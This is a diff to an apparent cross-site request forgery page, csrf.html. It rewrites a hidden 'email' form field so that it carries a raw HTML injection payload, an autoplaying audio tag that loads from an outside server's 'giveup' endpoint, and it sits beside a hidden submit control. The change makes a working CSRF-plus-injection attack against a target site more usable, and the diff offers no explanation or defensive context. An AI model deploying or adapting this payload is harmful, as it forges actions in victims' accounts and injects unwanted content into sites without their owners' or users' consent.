--- a/csrf.html
+++ b/csrf.html
@@ -18,7 +18,7 @@
       <input
         type="hidden"
         name="email"
-        value="%3Caudio+controls+src%3D%22https%3A%2F%2Fserver.huanchengfly.top%2Fapi%2Fgiveup%22+autoplay%3E%3C%2Faudio%3E"
+        value="<audio controls src='https://server.huanchengfly.top/api/giveup' autoplay></audio>"
       />
       <input type="hidden" name="submit" value="submit" />
       <input type="submit" value="Submit" style="display: none" />
